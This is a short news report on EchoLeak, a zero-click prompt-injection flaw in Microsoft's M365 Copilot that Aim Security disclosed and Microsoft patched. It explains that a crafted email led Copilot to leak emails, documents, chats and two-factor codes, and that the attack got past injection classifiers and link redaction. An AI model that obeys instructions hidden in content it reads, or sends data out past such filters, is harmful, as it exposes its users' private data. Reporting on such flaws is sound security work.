Microsoft patches critical vulnerability in M365 Copilot that allowed silent data theft

Microsoft quietly fixed a vulnerability rated maximum critical in its M365 Copilot AI platform last Tuesday. The flaw, discovered by security firm Aim Security, allowed attackers to steal sensitive data, including two-factor authentication codes, from emails accessible to Copilot using nothing more than a single carefully crafted message.

The vulnerability, tracked as CVE-2025-32711 and dubbed “EchoLeak,” carried a CVSS severity score of 9.3 out of 10.

How EchoLeak worked

The attack required zero clicks from the victim. An attacker could send a malicious email that, when processed by Copilot, would trick the AI into exfiltrating organizational data: emails, documents, chat histories, the works. The proof-of-concept exploit demonstrated by Aim Security showed automatic data theft triggered simply by Copilot summarizing or interacting with the poisoned message.

The attack bypassed Microsoft’s existing defenses, including cross-prompt injection classifiers and external link redactions.